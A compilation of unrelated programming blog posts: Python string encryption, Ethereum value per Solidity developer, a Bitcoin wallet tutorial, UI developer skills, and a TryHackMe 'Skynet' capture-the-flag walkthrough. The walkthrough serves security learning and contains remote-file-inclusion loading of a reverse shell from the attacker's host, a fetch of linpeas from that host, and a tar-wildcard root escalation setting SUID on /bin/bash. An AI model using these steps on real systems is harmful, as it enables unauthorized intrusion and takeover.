
Two Easy Ways to Encrypt and Decrypt Python Strings


Today I gave a service consultant access to one of my AWS servers. A few files on that server contain sensitive personal data, so I was reluctant to share them with the consultant. Python is my default way to solve these types of problems, so naturally I wondered: how can I encrypt this data using Python and decrypt it again after the consultant is done? In this article, I’ll share my learnings! 👇

🔐 Question: Given a Python string, how can you encrypt it (with a password or otherwise) and later decrypt the ciphertext to recover the original cleartext?

There are several ways to encrypt and decrypt Python strings. I decided to share only the top two ways (my personal preference is Method 1):

Method 1: Cryptography Library Fernet

To encrypt and decrypt a Python string, install and import the cryptography library, generate a Fernet key, and create a Fernet object with it. You can then encrypt the string using the Fernet.encrypt() method and decrypt the encrypted string using the Fernet.decrypt() method.

If you haven’t already, you must first install the cryptography library using the pip install cryptography shell command or variants thereof. 👉 See more here.

Here’s a minimal example where I’ve highlighted the encryption and decryption calls:

# Import the cryptography library
from cryptography.fernet import Fernet
# Generate a Fernet key
key = Fernet.generate_key()
# Create a Fernet object with that key
f = Fernet(key)
# Input string to be encrypted
input_string = "Hello World!"
# Encrypt the string
encrypted_string = f.encrypt(input_string.encode())
# Decrypt the encrypted string
decrypted_string = f.decrypt(encrypted_string)
# Print the original and decrypted strings
print("Original String:", input_string)
print("Decrypted String:", decrypted_string.decode())

This small script first imports the Fernet class from the cryptography library, which provides high-level cryptographic primitives and algorithms such as

  • symmetric encryption,
  • public-key encryption,
  • hashing, and
  • digital signatures.

A Fernet key is then generated and used to create a Fernet object. The input string to be encrypted is then provided as an argument to the encrypt() method of the Fernet object. This method encrypts the string using the Fernet key and returns an encrypted string.

The encrypted string is then provided as an argument to the decrypt() method of the Fernet object. This method decrypts the encrypted string using the Fernet key and returns a decrypted string.

Finally, the original string and the decrypted string are printed to the console.

The output is as follows:

Original String: Hello World!
Decrypted String: Hello World!
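The question above also mentions using a password. Fernet.generate_key() creates a random key, but you can just as well derive a Fernet key from a password with a key derivation function. Here’s a minimal sketch using PBKDF2HMAC from the same cryptography library; the example password, the salt handling, and the iteration count are illustrative choices, not fixed requirements:

import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

password = b"my secret password"   # example password
salt = os.urandom(16)              # store the salt next to the ciphertext
# Derive a 32-byte key from the password and salt
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=480_000)
key = base64.urlsafe_b64encode(kdf.derive(password))  # Fernet expects a urlsafe-base64 key
f = Fernet(key)
token = f.encrypt(b"Hello World!")
print(f.decrypt(token).decode())   # Hello World!

To decrypt later, re-derive the same key from the password and the stored salt.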


Method 2: PyCrypto Cipher

Install and import the PyCrypto library (or its maintained drop-in replacement, PyCryptodome) to encrypt and decrypt a string. As preparation, pad the input string to 32 characters using string.rjust(32) so its length is a multiple of the 16-byte AES block size. Then, define a secret key, i.e., a “password”. Finally, encrypt the string using the AES algorithm, a type of symmetric-key encryption.

You can then decrypt the encrypted string again by using the same key.

Here’s a small example:

# Import the AES cipher from the PyCrypto/PyCryptodome library
from Crypto.Cipher import AES
# Input string to be encrypted (padded to 32 characters, a multiple of the 16-byte AES block size)
input_string = "Hello World!".rjust(32)
# Secret key (pw) -- must be 16, 24, or 32 bytes long
key = b'1234567890123456'
# Encrypt the string (ECB mode for simplicity; not recommended for sensitive data)
cipher = AES.new(key, AES.MODE_ECB)
encrypted_string = cipher.encrypt(input_string.encode())
# Decrypt the encrypted string (use a fresh cipher object for decryption)
decipher = AES.new(key, AES.MODE_ECB)
decrypted_string = decipher.decrypt(encrypted_string)
# Print the original and decrypted strings (strip() removes the padding for display)
print("Original String:", input_string.strip())
print("Decrypted String:", decrypted_string.decode().strip())

This code imports the AES cipher from the PyCrypto library and uses it to encrypt and decrypt a string.

The input string is "Hello World!", which is padded to 32 characters so its length is a multiple of the AES block size.

Then, a secret key (password) is defined.

The string is encrypted using the AES algorithm, which is a type of symmetric-key encryption.

The encrypted string is then decrypted using the same key and the original and decrypted strings are printed. Here’s the output:

Original String: Hello World!
Decrypted String: Hello World!


Thanks for Visiting! ♥

To keep learning Python in practical coding projects, check out our free email academy — we have cheat sheets too! 🔥


$821,000 Ethereum Value per Solidity Developer


Ethereum’s Total Value Locked (TVL) is $28,000,000,000 USD and Ethereum’s market cap is $193,000,000,000 USD. Based on my estimations below, there are at most 269,000 monthly active Solidity developers.

Therefore, the Ethereum TVL per Solidity developer is more than $104,000, and the Ethereum market cap per Solidity developer is more than $717,000. So for all practical purposes, you can assume that the combined value (TVL plus market cap) per Solidity developer is at least $821,000.*

*I used very conservative assumptions; the real numbers will be much higher (see below). Also, I’m aware that not all Ethereum developers use Solidity, but most (see below). At the time of writing, we’re amid a bear market in 2023, with the TVL of both Ethereum and its Solidity smart contracts down roughly 70%. As the number of developers doesn’t grow proportionally to the price in a bull market, this number can be seen as a historic “worst-case” estimation.

How Many Monthly Active Solidity Developers Are There?

My basic assumption is that a monthly active Solidity developer checks the Solidity docs at least once per month. Currently, the Solidity docs get roughly 580,000 visits per month at 2.15 pages per visit, so dividing visits by pages per visit yields an estimate of roughly 269,000 active Solidity developers per month.
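For transparency, here’s the back-of-the-envelope arithmetic as a tiny Python sketch; all inputs are the figures quoted above:

# Figures quoted in this article (USD)
tvl = 28_000_000_000
market_cap = 193_000_000_000
# Rough developer estimate: 580,000 monthly visits / 2.15 pages per visit ≈ 269,000
devs = 269_000

print(f"TVL per developer:        ${tvl / devs:,.0f}")                  # ≈ $104,000
print(f"Market cap per developer: ${market_cap / devs:,.0f}")           # ≈ $717,000
print(f"Combined per developer:   ${(tvl + market_cap) / devs:,.0f}")   # ≈ $821,000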

Reasons there are more Solidity developers: Some active Solidity developers may not check out the docs during development. However, I think this won’t change the number by more than a factor of 2-3x.

Reasons there are fewer Solidity developers: On the other hand, this may be a significant overestimation of the number of Solidity devs because the number of sessions may be much larger than the number of active users. Many Solidity developers will check out the docs multiple times per month!

So, the 269,000 Solidity developers per month number is likely to be a significant overestimation and can be seen as an upper bound. Consequently, the TVL per Solidity developer will be much larger than our $821,000 number, even considering that not all ETH dApp developers use Solidity (only most).

If you’re interested in learning to create your own dApps and participate in this highly profitable growth market, check out our new Finxter Academy course:


[TryHackMe] Skynet Walkthrough Using Remote File Inclusion


🔐 How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer

YouTube Video

CHALLENGE OVERVIEW

  • Link: https://tryhackme.com/room/skynet
  • Difficulty: Easy
  • Target: user/root flags
  • Highlight: exploiting a remote file inclusion vulnerability to spawn a reverse shell
  • Tools used: smbclient, smbmap, gobuster, metasploit
  • Tags: gobuster, smb, rfi, squirrelmail

BACKGROUND

In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.

IPs

export targetIP=10.10.144.117
export myIP=10.6.2.23

ENUMERATION

sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn

NMAP SCAN RESULTS

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
Nmap scan report for 10.10.144.117
Host is up (0.084s latency).
Not shown: 65529 closed tcp ports (reset)
PORT	STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
| smb2-security-mode:
| 3.1.1:
|_	Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-01-24T04:40:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-01-23T22:40:36-06:00

TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 13.67 ms 10.6.0.1
2 ... 3
4 81.31 ms 10.10.144.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds

DIRB SCAN RESULTS

The SquirrelMail directory looks interesting. We’ll check that out in a minute.

ENUMERATE THE SMB SHARE WITH NMAP SCAN

nmap --script smb-enum-shares -p 139 10.10.144.117

Output:

Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
Nmap scan report for 10.10.144.117
Host is up (0.086s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.144.117\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.144.117\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_	Current user access: <none>
smbmap -H 10.10.144.117

[+] Guest session       IP: 10.10.144.117:445   Name: 10.10.144.117
        Disk            Permissions     Comment
        ----            -----------     -------
        print$          NO ACCESS       Printer Drivers
        anonymous       READ ONLY       Skynet Anonymous Share
        milesdyson      NO ACCESS       Miles Dyson Personal Share
        IPC$            NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

LOGIN TO SAMBA SHARES AS ANONYMOUS

smbclient //10.10.144.117/anonymous
Password for [WORKGROUP\kalisurfer]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                   D        0  Thu Nov 26 11:04:00 2020
  ..                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt       N      163  Tue Sep 17 23:04:59 2019
  logs                D        0  Wed Sep 18 00:42:16 2019

From the logs directory, grab log1.txt (a password list) and note the username milesdyson.

WALK THE WEBSITE

We discovered a login portal for squirrelmail from the dirb scan. Let’s check it out now in our browser.

http://10.10.144.117/squirrelmail

Loading the site reveals a version number. A quick search points to a local file inclusion vulnerability.

SquirrelMail version 1.4.23 [SVN]
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion

ENUMERATING THE SMB SHARE

The first password on the list from the log1.txt file (pulled from the SMB share) works! We are in milesdyson’s email account now and see two interesting emails.

Email 1 -- from serenakogan@skynet:

01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111

Email 2 -- from skynet@skynet:

new smb password: )s{A&2Z=F^n_E.B`
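As a side note, the binary blob in the first email is just space-separated 8-bit ASCII codes, so a short Python snippet like this decodes it (only the first few groups are shown; paste the full message from the email):

binary_message = "01100010 01100001 01101100 01101100 01110011"  # paste the full bit string here
decoded = "".join(chr(int(bits, 2)) for bits in binary_message.split())
print(decoded)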

LOGIN TO SMB SHARE AS milesdyson

smbclient //$targetIP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                                            D         0  Tue Sep 17 05:05:47 2019
  ..                                                           D         0  Tue Sep 17 23:51:03 2019
  Improving Deep Neural Networks.pdf                           N   5743095  Tue Sep 17 05:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf     N  12927230  Tue Sep 17 05:05:14 2019
  Convolutional Neural Networks-CNN.pdf                        N  19655446  Tue Sep 17 05:05:14 2019
  notes                                                        D         0  Tue Sep 17 05:18:40 2019
  Neural Networks and Deep Learning.pdf                        N   4304586  Tue Sep 17 05:05:14 2019
  Structuring your Machine Learning Project.pdf                N   3531427  Tue Sep 17 05:05:14 2019

                9204224 blocks of size 1024. 5831424 blocks available

Let’s grab the important.txt file:

get important.txt

Reading through the contents, we are pointed toward a hidden beta CMS directory:

/45kra24zxs28v3yd

GOBUSTER FOR DIRECTORY SNIFFING

We’ll further enumerate the hidden beta cms directory now with gobuster.

gobuster dir -u http://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.173/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
/index.html (Status: 200) [Size: 418]
===============================================================
2023/01/24 09:53:04 Finished
===============================================================

ADMINISTRATOR PORTAL DISCOVERED!

http://10.10.169.173/45kra24zxs28v3yd/administrator/

IDENTIFY A KNOWN VULNERABILITY

Looking up the name of the CMS that powers the administrator portal shows that there is a known remote file inclusion vulnerability.

SPAWN A REVERSE SHELL WITH PHP PENTEST MONKEY AND REMOTE FILE INCLUSION

After preparing a basic PHP reverse shell and serving it with a simple HTTP server, we load the following address in our browser:

http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php

STABILIZE THE SHELL

python -c 'import pty;pty.spawn("/bin/bash")';

ENUMERATE WITH LINPEAS

After downloading linpeas.sh and serving it with the simple HTTP server, we can copy it over to our target machine’s /tmp folder with wget http://$myIP:port/linpeas.sh.

$ ./linpeas.sh

[linpeas-ng by carlospolop -- ASCII-art banner and sponsor box omitted]

🔐 ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own computers and/or with the computer owner’s permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look at it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
  LightMagenta: Your username

Starting linpeas. Caching Writable Folders...

═══════════════════════════════╣ Basic information ╠═══════════════════════════════
OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: skynet
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (learn more with -h)

══════════════════════════════╣ System Information ╠══════════════════════════════
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.16

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Potentially Vulnerable to CVE-2022-2588

--- abbreviated ---

THE MOST RELEVANT INFO FROM LINPEAS:

VULNERABLE TO CVE-2021-4034
MAYBE CVE-2022-2588
https://github.com/carlospolop/PEASS-ng/releases/download/20230122/linpeas.sh

[+] [CVE-2017-16995] eBPF_verifier
    Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
    Exposure: highly probable
    Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
    Download URL: https://www.exploit-db.com/download/45010
    Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

FURTHER ENUMERATION

Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.

CHECK CRONJOBS

cat /etc/crontab

Output:

# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root	cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

The first job in the list is set to run every minute and it just executes backup.sh. Let’s find out what that file does.

We can see that backup.sh starts a new shell, changes directory to /var/www/html, and then creates a tarball of all the files from /var/www/html and stores it in /home/milesdyson/backups/backup.tgz.

The * in the tar command is a wildcard that expands to everything in the current directory. We can exploit this by dropping our own files into /var/www/html with names that tar interprets as command-line options, so that the cron job, which runs backup.sh and creates a tarball of the directory every minute, launches our malicious file magic.sh.

PLAN AND CARRY OUT PRIVILEGE ESCALATION

First, we’ll create the magic.sh file that will add a SUID bit to /bin/bash. After setting up the hack and waiting at least one minute, we can spawn a root shell with /bin/bash -p (the -p flag preserves the effective user ID, i.e., the SUID root privilege).

printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh

Next, let’s use echo to create two more files with unusual names that are necessary for the tarball creation process to trigger our magic.sh program and add the SUID bit to /bin/bash.

echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh"
echo "/var/www/html" > --checkpoint=1

USER FLAG

Let’s grab the user flag from /home/milesdyson:

$ cat user.txt
7c—-omitted—----07

ROOT FLAG

cat /root/root.txt
3f—-omitted—----49

TAKE-AWAYS

Takeaway #1 – The simpler solution is usually the better solution. I wasted a lot of time trying to get Metasploit to catch the reverse shell and start a Meterpreter session.

In the end, I learned I had overlooked setting the payload on msfconsole listener (exploit(multi/handler)) to match that of my reverse shell payload.

The payload isn’t listed when you run “options”, but it still needs to be set to properly catch the shell and start a Meterpreter session. In the end, I rooted the box with a basic shell session, and all of that precious time spent on Metasploit didn’t help us get root access.

Takeaway #2 – Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.


I Used These 3 Easy Steps to Create a Bitcoin Wallet in Python (Public/Private)


As I write this, Bitcoin is in a deep bear market. That’s the perfect time to learn about the tech and start building!

After listening to a podcast from Lyn Alden today, I wondered if it is possible to programmatically create a Bitcoin wallet, i.e., a public/private key pair.

This can be extremely useful in practice, not only if you want to create an application that uses the “decentralized money layer” to transfer value between two parties in a fully automatic way, but also if you want to quickly create a public/private key pair to send and receive BTC without trusting a third party.

You may not trust that wallet provider after all. It is in the nature of the Bitcoin protocol that if you desperately need it, you’ll need it quickly and without lots of trust assumptions. So better be prepared!

In this project, we’ll answer the following interesting question.

🪙 Project: How to create a Bitcoin wallet in Python (public/private key pair)?

Step 1: Install Library

Use PIP to install the bitcoinaddress library in your actual or virtual environment.

🔐 Is It Safe? I investigated the library code from the GitHub repository associated with this library, and I couldn’t find any trust issues. Specifically, I searched for “hacks” in the code, such as sending the public/private key pair to a remote server, but the repository seems to be clean. It is also well-respected in the community, so unlikely to be tampered with. I didn’t check if the public/private key pairs have maximum entropy, i.e., are truly randomly created with all private keys having the same likelihood. I cannot guarantee that this is 100% safe because I don’t know the owner of the library — but it looks safe at first and second glance.

To install the library, here are three of the most common ways:

👉 Python 3:
pip3 install bitcoinaddress

👉 Standard Python and Python 2 Installation:
pip install bitcoinaddress

👉 Jupyter Notebook Cell:
!pip install bitcoinaddress

Here’s what this looks like in my Jupyter Notebook:

🌍 Recommended: 5 Steps to Install a Python Library

Step 2: Import and Create Wallet

The Wallet class from the bitcoinaddress module allows you to easily create a new and random public/private keypair using the Wallet() constructor method, i.e., all you need to create a new random Bitcoin wallet.

from bitcoinaddress import Wallet
wallet = Wallet()

Stay with me. You’re almost done! 💪

Step 3: Print Wallet

Next, print the content of the newly created wallet. This contains all the information you need about the public and private keys and addresses.

print(wallet)

In the following output, the two most relevant pieces of information are the public address and the private key:

Private Key HEX: 6b789bec69f7f90c2ed73c8ee58f1f899b42fde5641359f6b76a27b4406399f7
Private Key WIF: 5JdcnccAMqs1t38VTPyeGHgBQ7KaYGueSqUAmLBTzVqFzh4ssUN
Private Key WIF compressed: KzpcxLACJzfktGQ4bWR1UUbvtzu133DNH2vv6ffC8nG1BFSUFBfr

Public Key: 0415d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be997d31989f6dcca716db63898c739621a86aa4a7bbe74c8936a6f1bbc7937c5c0
Public Key compressed: 0215d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be9

Public Address 1: 14XyDoAgdGF7xiCrgux5Bd7P993PnXALuW
Public Address 1 compressed: 1LW26DRtBraVQ5ec7J5D3uQsM3AD3oVHXx
Public Address 3: 32iX1WnnMkLQLc6beTQ6no5H4J6arvUeBP
Public Address bc1 P2WPKH: bc1q6hn4e55vfh6ka0z88tpr2jmqze8w4j84axsjh4
Public Address bc1 P2WSH: bc1qhff5zxmy7rs5mvx037ztg95nnnqe97fet66l65xgsafv89tmz8xssm8tph

The output of the bitcoinaddress.Wallet() method provides the details of a new bitcoin wallet.

It includes the private key in both HEX and Wallet Import Format (WIF) formats, as well as the compressed version of the WIF.

It also provides the public key, both in uncompressed and compressed formats, as well as three different public addresses generated from the public key.

I actually checked the address on a Blockchain explorer, and it’s the correct one:

I also checked whether the public address and the private key belong together, and they seem to match:

Additionally, it provides 2 SegWit addresses generated from the public key; one in Pay-to-Witness-Public-Key-Hash (P2WPKH) format and one in Pay-to-Witness-Script-Hash (P2WSH) format.


20 Real-Life Skills You Need as a UI Developer in 2023


I have created many apps throughout my career. Some apps, such as the Finxter Python learning app, have reached millions of users over the years.

While I’m not a professional web designer (by education), I was taught the hard way (by trial and error) that there are some crucial and timeless skills you need to master as a User Interface developer no matter what.

This list of 20 tips is my best-of compilation. So, without further ado, let’s dive right in! 👇

Skill 1: HTML/CSS

HTML and CSS are the building blocks of any website, and a must-have for any UI developer.

HTML is the structural markup language used to create webpages, while CSS is the styling language used to make them look attractive.

🌍 Recommended: Full-Stack Web Developer — Income and Opportunity

Skill 2: JavaScript

JavaScript is a scripting language used to create dynamic and interactive webpages. UI developers need to be proficient in this language to develop modern websites and web applications.

🌍 Recommended: JavaScript Developer — Income and Opportunity

Skill 3: Responsive Design

Responsive design ensures that a website looks and functions great on any device (e.g., mobile devices).

UI developers must be able to create websites that look great on any screen size, from mobile phones to large desktop displays.

🌍 Recommended: Mobile App Developer — Income and Opportunity

Skill 4: Wireframing

Wireframing is the process of creating a blueprint of a website or web application. UI developers need to be able to create wireframes to plan out the structure and layout of a website.

This skill especially requires you to be able to communicate effectively with your clients and project owners.

🌍 Recommended: Get More Clients as a Freelance Developer with This One Simple Trick

Skill 5: User Interface Design

User interface design is the process of creating user-friendly and visually appealing interfaces for websites and web applications.

UI developers need to understand the principles of good design to be able to create interfaces that are both attractive and easy to use.

🌍 Recommended: Less Is More in Design

Skill 6: User Experience Design

User experience design is the process of creating engaging and meaningful experiences for users of websites and web applications.

UI developers need to understand the principles of user experience and dive deep into users’ emotions so they can create enjoyable and fun experiences.

Skill 7: Cross-Browser Compatibility

Cross-browser compatibility is the ability of a website or web application to work properly across multiple types of web browsers.

UI developers need to ensure that their websites and applications look and function properly on all types of browsers.

Skill 8: Version Control

Version control is a system used to track and manage changes to files and documents. UI developers need to be able to use version control to keep track of changes and ensure that their work is up to date.

🌍 Recommended: Git Cheat Sheet [Ultimate Guide]

Skill 9: Debugging

Yes, we all know it and fear it: debugging.

Debugging is the process of finding and fixing errors in a website or web application. UI developers need to be able to debug their code to ensure that their websites and applications are functioning correctly.

🌍 Recommended: Debugging in PyCharm — The Right Way

Skill 10: Testing/QA

Testing and Quality Assurance are processes used to ensure that a website or web application is functioning correctly before it is released. UI developers need to be able to test their work and ensure that it meets the specified requirements.

Testing is often done incorrectly or follows overly strict rules. In my world, when I create apps, I just play with them, pressing every button and entering all kinds of nonsense to test my app. This has brought to light many more errors than standard unit tests.

Skill 11: Building User Interfaces with Frameworks

Frameworks are used to simplify the process of building user interfaces. UI developers need to be familiar with the most popular frameworks in order to create modern and efficient user interfaces.

Here’s a table I created to show the income distributions of different PHP frameworks:

🌍 Recommended: 8 PHP Frameworks That Make You Money as a Web Developer in 2023

Skill 12: Accessibility and Usability

Accessibility and usability are two important aspects of user interface design. In fact, there’s a huge megatrend towards creating more accessible user interfaces — often, they are legally required!

It’s a big growth market — unbelievable, isn’t it? 😉

UI developers need to be able to design interfaces that are both accessible and usable to provide the best user experience.

Skill 13: Interaction Design

Interaction design is the process of creating user interactions that are both intuitive and efficient. UI developers need to be able to create interactions that are easy to use and don’t require a lot of effort from the user.

Skill 14: Web Design Principles

Web design principles are the fundamental rules that should be followed when designing websites and web applications. UI developers need to understand these principles to create attractive and effective interfaces.

🌍 Recommended: 7 Tips to Write Clean Code


The Art of Clean Code

Most software developers waste thousands of hours working with overly complex code. The eight core principles in The Art of Clean Code will teach you how to write clear, maintainable code without compromising functionality. The book’s guiding principle is simplicity: reduce and simplify, then reinvest energy in the important parts to save you countless hours and ease the often onerous task of code maintenance.

  1. Concentrate on the important stuff with the 80/20 principle — focus on the 20% of your code that matters most
  2. Avoid coding in isolation: create a minimum viable product to get early feedback
  3. Write code cleanly and simply to eliminate clutter 
  4. Avoid premature optimization that risks over-complicating code 
  5. Balance your goals, capacity, and feedback to achieve the productive state of Flow
  6. Apply the Do One Thing Well philosophy to vastly improve functionality
  7. Design efficient user interfaces with the Less is More principle
  8. Tie your new skills together into one unifying principle: Focus

The Python-based The Art of Clean Code is suitable for programmers at any level, with ideas presented in a language-agnostic manner.


Skill 15: Graphic Design

Graphic design is the process of creating visuals and graphics for websites and web applications. UI developers need to be able to create attractive visuals to make their websites look appealing.

🌍 Recommended: Graphic Designer and Front-End Web Developer

Skill 16: Object-Oriented Programming

Object-oriented programming is a programming paradigm used to create complex websites and web applications. UI developers must understand this programming paradigm to create efficient and powerful web applications.

🌍 Recommended: Object-Oriented Programming in Python

Skill 17: Animation and Effects

Animations and effects are used to create dynamic and engaging user interfaces. UI developers need to be able to create animations and effects to make their websites more attractive and engaging.

Skill 18: Mobile App Design

Mobile app design is the process of designing user interfaces for mobile applications. UI developers need to understand the principles of mobile app design in order to create engaging and user-friendly apps.

🌍 Recommended: Top 6 Mobile App Development Career Paths in 2023

Skill 19: Front-End Performance Optimization

Front-end performance optimization is the process of optimizing a website or web application to make it faster and more efficient. UI developers must understand optimization principles to create fast and efficient websites and web applications.

🌍 Recommended: Premature Optimization is the Root of All Evil!

Skill 20: Data Visualization

Data visualization is the process of creating visuals that represent data in an easy-to-understand way. UI developers need to be able to create effective data visualizations to make complex data easier to understand.

Personally, I’d recommend you check out Plotly Dash — a Python framework for easy development of dashboard apps:

🌍 Recommended: Create Your First App in Plotly Dash

Learn More


If you’re interested in learning more about how to create beautiful dashboard applications in Python, check out our new book Python Dash.

